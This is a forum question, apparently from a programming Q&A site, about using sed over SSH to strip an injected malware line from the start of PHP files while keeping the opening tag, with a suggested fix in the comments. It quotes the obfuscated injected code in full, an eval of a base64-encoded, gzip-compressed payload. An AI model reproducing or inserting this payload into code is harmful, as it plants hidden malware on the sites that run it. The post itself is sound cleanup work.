# Remove malware code and replace with new code linux

Tags: linux, sed, find-replace

I have tried removing the malware code in all php file using SSH but when I remove it, it also removes the `<?php` code in the beginning.

How can I just remove the text below and keep the `<?php` code in the file?

I used this command:

```
sed -i '/gzuncompress(base64_decode/d' *
```

Replace:

```
<?php eval(gzuncompress(base64_decode('eNpdUs1u00AQfpWNlYMdrDhO89dEOZTKolEpQYkBoRpZU+86u8TZtdZr1X6A3jhy4Q248gxUvAavwjhpgWQPO/+ab74ZkdottstN7XVeZkpRKeRnmJIFyUSyJbUqNWGgM3XHXAKSklJSdXDfg0l4t+PZ7XgdrN4Hq1vrKgzfxu/Qii9eBW9C65PjTNvxt+8/f/14fJyD1lDb1iXXKvKHQ2a5VlQNRqj7mqUqqsYTdIVaUCYNajfrRYDiQ5OAXe+LQ0EiZFmhusgx0FMyqkZDNC8k1UpQ1JY504ByDSloYTmzVGkGCbf/QiFQtOMvvx++PjhTkdpFuBK5Kk4Hiarh8L9Z3OeS1nzuddaggfvnaYJk7fC5RG2hRjpSyAp2SqaBLUPWSA7SFESlqUs2upRGyA0SjTEgRqssw/o9opYoCmYQ0OVyeb0IbnHu0cTkcSloXBo06J7bIgiTJoHZFt9HMTKIy8gfDXZIgG+5obgJbOdFb9zr945Bf2TA92vG7sIQrcpNs81O76x3ir7YweEWiOHNVdwpZep9bt+ZXTGggbat1yoBI5ScEm5MPvU8/2zQjaqz/uC86/uj7njiCUmbZVXdnOe4FirYMaQlJzWicrENGJIylhVkg0CaI3NmTFKR/vuflvrkmB1jXjeI3WdRM8YAOG/m+wMpCvZB')));?>
```

with

```
<?php
```

Comment: Try `sed -i 's/<?php eval(gzuncompress(base64_decode[^>]*>/<?php/g' *`

Comment: The sed command in question will delete the complete line (!) when line contains the pattern you specified.

Comment: Karan, does my suggestion work for you?